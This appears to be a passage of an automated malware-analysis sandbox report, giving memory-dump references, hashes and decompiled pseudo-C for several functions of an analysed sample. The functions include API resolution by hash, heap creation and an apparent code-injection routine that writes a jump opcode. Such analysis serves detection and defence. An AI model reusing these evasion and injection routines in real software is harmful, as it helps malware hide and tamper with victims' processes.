Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction ID: dbbc53b207343716fcf6bb7a9e5fb1747581d6cfaf5bf6c359a96101f3c192a4
Opcode Fuzzy Hash: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction Fuzzy Hash: 71F0C2B52003097FE7259E1ADC44DBFBBFDEBC1B18F10841DB0D643240DA34AC508AA6

Uniqueness

Uniqueness Score: -1.00%

Function 70995DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E70995DF0(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E7098C33C(_t19) == 0) {
					_v12 = _a8;
					if(E70992F8C(0x4bcc7cba, 0x2876e068) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E7099352C(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x70995df3
0x70995df5
0x70995e01
0x70995e0b
0x70995e21
0x70995e40
0x70995e23
0x70995e34
0x70995e38
0x70995e58
0x70995e3a
0x70995e3a
0x70995e3a
0x70995e38
0x70995e41
0x70995e46
0x70995e4f
0x70995e48
0x70995e48
0x70995e4a
0x70995e4a
0x70995e03
0x70995e03
0x70995e03
0x70995e55

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,4BCC7CBA,2876E068,?,?,?,70995CE5,00000000,?,00000000,?), ref: 70995E34

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction ID: 290b6ca33b87c24256185b54034d04e8ad8feb80179ae39cb256e4af7f01de77
Opcode Fuzzy Hash: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction Fuzzy Hash: 51F08671228206BEDB119E64CC40A6F77E9ABC8240F10882DB89AD2144DA32DA04872B

Uniqueness

Uniqueness Score: -1.00%

Function 70993564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E70993564(void* __ecx) {
				void* _t3;
				intOrPtr* _t8;
				void* _t12;

				_t12 = __ecx;
				if( *0x7099d228 == 0xcd845700) {
					_t8 = E70992F8C(0xa5eabdf8, 0xd926c223);
					 *0x7099d22c = E70992F8C(0xa5eabdf8, 0x9b42cb07);
					if( *0x7099d228 == 0xcd845700) {
						 *_t8(2, 0, 0, 0, 0, 0); // executed
						 *0x7099d228 = 0;
					}
				}
				_t3 = E70992F8C(0xa5eabdf8, 0x80febacc);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t12);
					_push(8);
					_push( *0x7099d228);
					asm("int3");
					return _t3;
				}
			}

0x7099356c
0x70993574
0x709935a7
0x709935b8
0x709935c3
0x709935ce
0x709935d0
0x709935d0
0x709935c3
0x70993580
0x70993587
0x70993597
0x70993589
0x70993589
0x7099358a
0x7099358c
0x7099358e
0x7099358f
0x7099358f

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,A5EABDF8,9B42CB07,A5EABDF8,D926C223,?,?,00000000,7098DEB9,?,?), ref: 709935CE

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 3546766ab520a59ab38f4fdab334ec6e7d7e74faab56bd81e02c6b61836f56a1
Instruction ID: 39e75fc98bf30f6184ab4a79a0f6f0e24fd662d88578fa5acbcc78fcf959d770
Opcode Fuzzy Hash: 3546766ab520a59ab38f4fdab334ec6e7d7e74faab56bd81e02c6b61836f56a1
Instruction Fuzzy Hash: E1F0AE72228111BDD3151F76AC44E5EBEECEFC9617BA1C43DB656EA040D6144840D62B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 70989144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E70989144(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				char _v60;
				intOrPtr _v92;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				signed int _v116;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				char _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				char _v196;
				void* _v200;
				signed int _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				intOrPtr _v228;
				intOrPtr _v236;
				void* _v268;
				char _v292;
				char _v308;
				char _v316;
				char _v320;
				void* _v324;
				char _v332;
				char _v340;
				void* _v356;
				void* _v360;
				char _v364;
				char _v380;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				intOrPtr _v400;
				signed int _v404;
				char _v408;
				void* _v412;
				char _v416;
				signed int* _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				signed int* _v444;
				char _v448;
				void* _v452;
				intOrPtr _v460;
				char _v464;
				void* _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				void* _v484;
				char _v492;
				char _v496;
				void* _v500;
				char _v508;
				char _v516;
				signed int _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _v548;
				char _v552;
				char _v556;
				char _v560;
				signed int _v564;
				signed int _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t437;
				intOrPtr _t442;
				signed int _t444;
				char* _t459;
				char _t534;
				signed int _t544;
				intOrPtr _t546;
				signed int _t550;
				signed int _t556;
				intOrPtr _t561;
				signed int _t567;
				char _t579;
				intOrPtr _t584;
				char _t585;
				intOrPtr _t589;
				char _t590;
				intOrPtr _t594;
				char _t595;
				intOrPtr _t599;
				char _t600;
				intOrPtr _t604;
				char _t605;
				intOrPtr _t609;
				signed int _t622;
				char _t629;
				intOrPtr _t633;
				signed char* _t635;
				signed int _t638;
				intOrPtr _t641;
				signed int* _t647;
				signed int* _t650;
				intOrPtr _t665;
				char* _t806;
				signed int* _t836;
				char* _t837;
				char* _t844;
				void* _t845;
				intOrPtr* _t854;
				signed int* _t856;
				intOrPtr* _t857;
				signed int* _t858;
				signed int* _t860;
				signed int* _t863;
				intOrPtr _t864;
				intOrPtr _t867;
				char _t868;
				signed int _t869;
				intOrPtr* _t872;
				intOrPtr* _t874;
				intOrPtr* _t875;
				intOrPtr* _t876;
				intOrPtr* _t877;
				intOrPtr* _t878;
				signed int* _t881;
				intOrPtr* _t882;
				char* _t907;
				void* _t935;
				char _t950;
				char _t951;
				intOrPtr* _t953;
				void* _t954;
				intOrPtr* _t955;
				void* _t957;

				_t957 = __eflags;
				_t953 =  &_v496;
				_t641 = __edx;
				_v40 = __ecx;
				_t951 =  *((intOrPtr*)(__ecx + 0xc));
				E70992F8C(0x23627913, 0xae88daa3);
				_v496 = 0;
				E7098F620( &_v492, 0);
				_v480 = 0;
				_v476 = 0;
				E7098F620( &_v472, 0);
				_v528 = 0;
				E7098F620( &_v524, 0);
				_v392 = 0x4145240a;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x90], xmm0");
				E7098F8C4( &_v528, E7098F568( &_v528) + 0x10);
				E7098F558( &_v532, E7098F568( &_v532) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v540 = _v540 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v536 + 0x88)) = 0x22dc1034;
				asm("movq [ecx+0x90], xmm0");
				E7098F8C4( &_v536, E7098F568( &_v536) + 0x10);
				E7098F558( &_v540, E7098F568( &_v540) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v548 = _v548 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v544 + 0x88)) = 0xc06fd820;
				asm("movq [ecx+0x90], xmm0");
				E7098F8C4( &_v544, E7098F568( &_v544) + 0x10);
				E7098F558( &_v548, E7098F568( &_v548) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v556 = _v556 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v552 + 0x88)) = 0xa54975b2;
				asm("movq [ecx+0x90], xmm0");
				E7098F8C4( &_v552, E7098F568( &_v552) + 0x10);
				E7098F558( &_v556, E7098F568( &_v556) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v564 = _v564 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v560 + 0x88)) = 0x271e028;
				asm("movq [ecx+0x90], xmm0");
				E7098F8C4( &_v560, E7098F568( &_v560) + 0x10);
				E7098F558( &_v564, E7098F568( &_v564) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v572 = _v572 + 1;
				asm("pxor xmm0, xmm0");
				( &_v568)[0x22] = 0xf279aa39;
				asm("movq [ecx+0x90], xmm0");
				E7098F8C4( &_v568, E7098F568( &_v568) + 0x10);
				E7098F558( &_v572, E7098F568( &_v572) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t953 =  *_t953 + 1;
				E7099413C(0xa5eabdf8, _t953);
				E7098F558( &_v576, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x4c], xmm0");
				E7098F558( &_v580, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x54], xmm0");
				E7098F558( &_v584, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x64], xmm0");
				E7098F558( &_v588, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x6c], xmm0");
				E7098F558( &_v592, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x74], xmm0");
				E7098F558( &_v596, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x7c], xmm0");
				_v584 = _t951;
				E7098ADB8( &_v584,  &_v172, _t957,  &_v192);
				_t889 = _v176;
				_t931 = _v172;
				if((_v176 | _v172) != 0) {
					E7098B338( &_v308, _t951, __eflags, _t889, _t931);
					E7098F8DC( &_v516, __eflags);
					_v520 = 0;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v516 + 0x88)) = 0x5889e652;
					asm("movq [eax+0x8], xmm0");
					E7098F8C4( &_v516, E7098F568( &_v516) + 0x10);
					E7098F558( &_v520, E7098F568( &_v520) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v528 = _v528 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v524 + 0x88)) = 0x1eeb5e35;
					asm("movq [eax+0x8], xmm0");
					E7098F8C4( &_v524, E7098F568( &_v524) + 0x10);
					E7098F558( &_v528, E7098F568( &_v528) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v536 = _v536 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v532 + 0x88)) = 0xac5d5303;
					asm("movq [eax+0x8], xmm0");
					E7098F8C4( &_v532, E7098F568( &_v532) + 0x10);
					E7098F558( &_v536, E7098F568( &_v536) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v544 = _v544 + 1;
					_t954 = _t953 + 0xfffffff4;
					asm("movq xmm0, [esp+0x1bc]");
					asm("movq [esp], xmm0");
					_v548 =  &_v544;
					E7098BAB8( &_v340, __eflags);
					E7098F558( &_v552, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x5c], xmm0");
					E7098F558( &_v556, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x84], xmm0");
					_t935 = E7098F558( &_v560, 0x20);
					_v164 =  *((intOrPtr*)(_t935 + 8));
					_v144 =  *((intOrPtr*)(_t935 + 0xc));
					E7098F620( &_v396, 0);
					E7098F620( &_v416, 0);
					_push(0);
					_push( *0x7099b7c4);
					E709920A4(__eflags,  &_v100);
					E7098F75C( &_v416, __eflags);
					E7098E054( &_v100);
					E7098F8C4( &_v436, E7098F744( &_v420,  &_v100));
					_t437 = E7098F558( &_v424, 0);
					E70987970(_t951, _t437, E7098F558( &_v444, 0), _v112);
					_t442 = E7098F568( &_v448);
					_v228 = _t442;
					_t101 = _t442 + 2; // 0x2
					_v188 = E7098B0A4( &_v584, 0x20000000, __eflags, _t101);
					_v236 = 0x20000000;
					_t444 = E7098B0A4( &_v588, 0x80000000, __eflags, 0x82);
					_v184 = _t444;
					_v204 = 0x80000000;
					__eflags = _t444 | _v204;
					if((_t444 | _v204) == 0) {
						L51:
						E7098F6F0( &_v380);
						E7098F6F0( &_v364);
						E7098F6F0( &_v332);
						goto L1;
					}
					__eflags = _v116 | _v164;
					if((_v116 | _v164) == 0) {
						goto L51;
					}
					E709935D4( &_v292, 0, 0x80);
					_t955 = _t954 + 0xc;
					 *((intOrPtr*)( &_v316 + 0x78)) = _v20;
					E7098CDC0( &_v316, 0);
					_t459 =  &_v320;
					_t854 = _t459 + 0xe8;
					 *_t854 = _t641;
					 *((intOrPtr*)(_t854 - 4)) = _v20;
					_push(_t459);
					E7098B48C(_t641, _t459 - 0x20, _t854 - 4, _v20, _t951, _t951, _t854 - 4);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0x134], xmm1");
					_v236 = E7098F568(_v20);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esi+0x8], xmm1");
					_v220 = E7098F568(_t641);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [ebx-0x90], xmm1");
					E70993C8C(_t951,  &_v60 - 0x80, __eflags, _v148, _v128, 7,  &_v60);
					_t133 =  &(( &_v564)[0x58]); // 0x160
					_t856 = _t133;
					 *_t856 = _v164;
					_t856[1] = ( &_v564)[0x69];
					E7098F8DC( &_v564, __eflags);
					_v568 = 0;
					_t746 =  &_v564;
					asm("pxor xmm0, xmm0");
					_t136 = _t746 + 0x88; // 0x88
					 *_t136 = 0x853cdd04;
					asm("movq [eax+0x8], xmm0");
					E7098F8C4( &_v564, E7098F568( &_v564) + 0x10);
					E7098F558( &_v568, E7098F568( &_v568) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v576 = _v576 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v572 + 0x88)) = 0xb162dc4e;
					asm("movq [eax+0x8], xmm0");
					E7098F8C4( &_v572, E7098F568( &_v572) + 0x10);
					E7098F558( &_v576, E7098F568( &_v576) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v584 = _v584 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v580 + 0x88)) = 0xc15ccc53;
					asm("movq [eax+0x8], xmm0");
					E7098F8C4( &_v580, E7098F568( &_v580) + 0x10);
					E7098F558( &_v584, E7098F568( &_v584) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v592 = _v592 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v588 + 0x88)) = 0x73f8f999;
					asm("movq [eax+0x8], xmm0");
					E7098F8C4( &_v588, E7098F568( &_v588) + 0x10);
					E7098F558( &_v592, E7098F568( &_v592) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v600 = _v600 + 1;
					_t762 =  &_v596;
					asm("pxor xmm0, xmm0");
					_t160 = _t762 + 0x88; // 0xa8
					 *_t160 = 0x4145240a;
					asm("movq [eax+0x8], xmm0");
					E7098F8C4( &_v596, E7098F568( &_v596) + 0x10);
					E7098F558( &_v600, E7098F568( &_v600) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v608 = _v608 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v604 + 0x88)) = 0xf06b4c6b;
					asm("movq [eax+0x8], xmm0");
					E7098F8C4( &_v604, E7098F568( &_v604) + 0x10);
					E7098F558( &_v608, E7098F568( &_v608) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v616 = _v616 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v612 + 0x88)) = 0x7d07f92f;
					asm("movq [eax+0x8], xmm0");
					E7098F8C4( &_v612, E7098F568( &_v612) + 0x10);
					E7098F558( &_v616, E7098F568( &_v616) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v624 = _v624 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v620 + 0x88)) = 0x2c2324e8;
					asm("movq [eax+0x8], xmm0");
					E7098F8C4( &_v620, E7098F568( &_v620) + 0x10);
					E7098F558( &_v624, E7098F568( &_v624) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t857 = _t955;
					 *_t857 =  *_t857 + 1;
					E7099413C(0xa5eabdf8, _t857);
					E7098F558( &_v628, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xf4], xmm0");
					E7098F558( &_v632, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xfc], xmm0");
					E7098F558( &_v636, 0x20);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x104], xmm0");
					E7098F558( &_v640, 0x30);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x10c], xmm0");
					E7098F558( &_v644, 0x40);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x114], xmm0");
					E7098F558( &_v648, 0x50);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x11c], xmm0");
					E7098F558( &_v652, 0x60);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x124], xmm0");
					E7098F558( &_v656, 0x70);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [ecx+0x118], xmm0");
					_t534 = E7098A5A4( &_v644, __eflags);
					_v524 = _t857;
					_t950 = _t534;
					__eflags = _t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff;
					if((_t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff) == 0) {
						L50:
						E7098B608(_t955 + 0xbc);
						E7098CDE0( &_v320, __eflags);
						goto L51;
					}
					_t858 =  &_v128;
					__eflags =  *_t858 | _t858[1];
					if(( *_t858 | _t858[1]) != 0) {
						L18:
						_v396 = 0;
						while(1) {
							__eflags = E7098AD68(0x80, _t950, _v400, _v112, _v132);
							if(__eflags != 0) {
								break;
							}
							_t605 = E7098A5A4( &_v520, __eflags);
							_v400 = 0x80;
							_t950 = _t605;
							__eflags = _t950 - 0xffffffffffffffff | 0x81;
							if((_t950 - 0xffffffffffffffff | 0x81) == 0) {
								goto L50;
							}
							_t878 =  &_v396;
							_t609 =  *_t878 + 1;
							 *_t878 = _t609;
							__eflags = _t609 - 0xa;
							if(_t609 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v396 = 0;
						while(1) {
							_push(0x80);
							_push(_v132);
							_push(_v112);
							_push(_v400);
							_push(_t950);
							_t860 =  &(( &_v520)[0x38]);
							__eflags = E7098A298( &_v520, _t860);
							if(__eflags != 0) {
								break;
							}
							_t600 = E7098A5A4( &_v540, __eflags);
							_v420 = _t860;
							_t950 = _t600;
							__eflags = _t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t877 =  &_v416;
							_t604 =  *_t877 + 1;
							 *_t877 = _t604;
							__eflags = _t604 - 0xa;
							if(_t604 != 0xa) {
								continue;
							}
							goto L50;
						}
						asm("cdq");
						asm("movd xmm1, eax");
						_v416 =  *((intOrPtr*)(_t955 + 0x1a4));
						_t647 =  &_v408;
						asm("movd xmm0, edx");
						asm("punpckldq xmm1, xmm0");
						 *_t647 = 0;
						 *((intOrPtr*)(_t647 - 4)) = _v188;
						asm("movq [edx], xmm1");
						_t544 = E70993BA0(_t951, _t647 - 8, __eflags,  &(_t647[0x48]), 0x40, _t647);
						__eflags = _t544;
						if(_t544 != 0) {
							goto L50;
						}
						_v180 = 0;
						while(1) {
							_t863 = _v184;
							__eflags = E7098AD68(_t863, _t950, _v420,  *((intOrPtr*)(_t955 + 0x1a8)), _v188);
							if(__eflags != 0) {
								break;
							}
							_t595 = E7098A5A4( &_v540, __eflags);
							_v420 = _t863;
							_t950 = _t595;
							__eflags = _t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t876 =  &_v180;
							_t599 =  *_t876 + 1;
							 *_t876 = _t599;
							__eflags = _t599 - 0xa;
							if(_t599 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v184 = 0;
						while(1) {
							_t546 = E7098F558( &_v404, 0);
							_push(E7098F568( &_v408));
							_push(_v192);
							_push(_v144);
							_push(_v424);
							_push(_t950);
							_t864 = _t546;
							__eflags = E7098A298( &_v544, _t864);
							if(__eflags != 0) {
								break;
							}
							_t590 = E7098A5A4( &_v560, __eflags);
							_v440 = _t864;
							_t950 = _t590;
							__eflags = _t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t875 =  &_v204;
							_t594 =  *_t875 + 1;
							 *_t875 = _t594;
							__eflags = _t594 - 0xa;
							if(_t594 != 0xa) {
								continue;
							}
							goto L50;
						}
						_t550 = E70993BA0(_t951,  &_v428 - 8, __eflags,  &_v428 + 0x120, _v428,  &_v428);
						__eflags = _t550;
						if(_t550 != 0) {
							goto L50;
						}
						E7098F620( &_v208, 0);
						_v100 = 0xe9;
						E7098F578( &_v100 - 0x70, __eflags,  &_v100, 1);
						_t650 =  &_v104;
						_t556 = _v172 -  *((intOrPtr*)(_t650 - 0x54)) + 0xfffffffb;
						__eflags = _t556;
						 *_t650 = _t556;
						E7098F578(_t650 - 0x74, __eflags, _t650, 4);
						_t907 =  &_v448;
						asm("movq xmm0, [0x7099b798]");
						 *((intOrPtr*)(_t907 - 8)) = _v196;
						 *((intOrPtr*)(_t907 - 4)) =  *((intOrPtr*)(_t907 + 0x110));
						asm("movq [ebx], xmm0");
						E70993BA0(_t951, _t907 + 0x120 - 0x128, __eflags, _t907 + 0x120, 0x40, _t907);
						_v192 = 0;
						while(1) {
							_t561 = E7098F558( &_v208, 0);
							_push(E7098F568( &_v212));
							_push(_v160);
							_push(_v180);
							_push(_v444);
							_push(_t950);
							_t867 = _t561;
							__eflags = E7098A298( &_v564, _t867);
							if(__eflags != 0) {
								break;
							}
							_t585 = E7098A5A4( &_v580, __eflags);
							_v460 = _t867;
							_t950 = _t585;
							__eflags = _t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff) == 0) {
								L49:
								E7098F6F0(_t955 + 0x174);
								goto L50;
							}
							_t874 =  &_v180;
							_t589 =  *_t874 + 1;
							 *_t874 = _t589;
							__eflags = _t589 - 0xa;
							if(_t589 != 0xa) {
								continue;
							}
							goto L49;
						}
						_v180 = 0;
						while(1) {
							_t955 = _t955 + 0xffffffd8;
							asm("pxor xmm0, xmm0");
							_v640 = _t950;
							_v636 = _v460;
							_t868 = _v196;
							_v632 = _t868;
							_v628 = _v176;
							_t806 =  &_v580;
							_v624 =  *((intOrPtr*)(_t806 + 0x198));
							_v620 =  *((intOrPtr*)(_t806 + 0x184));
							asm("movq [esp+0x18], xmm0");
							asm("movq [esp+0x20], xmm0");
							__eflags = E7098AD04(__eflags);
							if(__eflags != 0) {
								break;
							}
							_t579 = E7098A5A4( &_v616, __eflags);
							_v496 = _t868;
							_t950 = _t579;
							__eflags = _t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff) == 0) {
								goto L49;
							}
							_t872 =  &_v216;
							_t584 =  *_t872 + 1;
							 *_t872 = _t584;
							__eflags = _t584 - 0xa;
							if(__eflags != 0) {
								continue;
							}
							goto L49;
						}
						_push(0);
						_t869 = _v164;
						__eflags = _t869;
						_t870 =  !=  ? _t869 + 0xc : _t869;
						_push( !=  ? _t869 + 0xc : _t869);
						_t567 = E7098C3A8(_t869,  &_v416, 0x2710);
						E7098F6F0(_t955 + 0x184);
						E7098B608( &_v448);
						E7098CDE0( &_v416, __eflags);
						E7098F6F0( &_v480);
						E7098F6F0( &_v464);
						E7098F6F0( &_v432);
						E7098F6F0( &_v632);
						E7098B680( &_v592);
						E7098F6F0( &_v608);
						__eflags = _t567;
						return 0 | _t567 == 0x00000000;
					}
					_v388 = 0;
					do {
						E7098F620(_t955 + 0x188, 0);
						_push(0x23627913);
						_push(_t955 + 0x1cc);
						E70991D00();
						E7098DD7C(_t955 + 0x1d0 - 8, _t955 + 0x1d0);
						_t879 = 0x7fffffff;
						E7098F578( &_v168, __eflags, _v92, E7098E94C(_v92, 0x7fffffff));
						E7098E054( &_v100);
						E7098D098( &_v108);
						_t836 =  &_v176;
						_t665 =  *((intOrPtr*)(_t836 + 0x28));
						 *((intOrPtr*)(_t836 - 0xf0)) = _v156;
						__eflags = E7098F568(_t836);
						if(__eflags <= 0) {
							L12:
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0xac]");
							asm("pxor xmm1, xmm1");
							_t837 =  &_v528;
							_v588 = _t950;
							_v584 =  *((intOrPtr*)(_t837 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v572 =  *((intOrPtr*)(_t837 + 0x198));
							_v568 =  *((intOrPtr*)(_t837 + 0x184));
							asm("movq [esp+0x18], xmm1");
							asm("movq [esp+0x20], xmm1");
							_t622 = E7098AD04(__eflags);
							__eflags = _t622;
							if(_t622 != 0) {
								E7099218C(0x3e8, _t879, _t950);
								E7098F6F0( &_v196);
								E7098ADB8( &_v564,  &(( &_v172)[5]), __eflags,  &_v172);
								_t881 =  &_v176;
								__eflags =  *_t881 | _t881[1];
								if(__eflags != 0) {
									goto L18;
								}
								_t629 = E7098A5A4( &_v564, __eflags);
								_v444 = _t881;
								_t950 = _t629;
								__eflags = _t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff;
								if((_t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff) == 0) {
									goto L50;
								}
								goto L16;
							}
							L13:
							E7098F6F0( &_v196);
							goto L50;
						}
						_v404 = 0;
						while(1) {
							_t635 = E7098F558( &_v160, _v404);
							_t879 = _t635;
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0x94]");
							_t844 =  &_v532;
							asm("movq xmm1, [0x7099b790]");
							_v592 = _t950;
							_v588 =  *((intOrPtr*)(_t844 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v576 = _t665;
							_v572 =  *((intOrPtr*)(_t844 + 0x80));
							_v568 =  *_t635 & 0x000000ff;
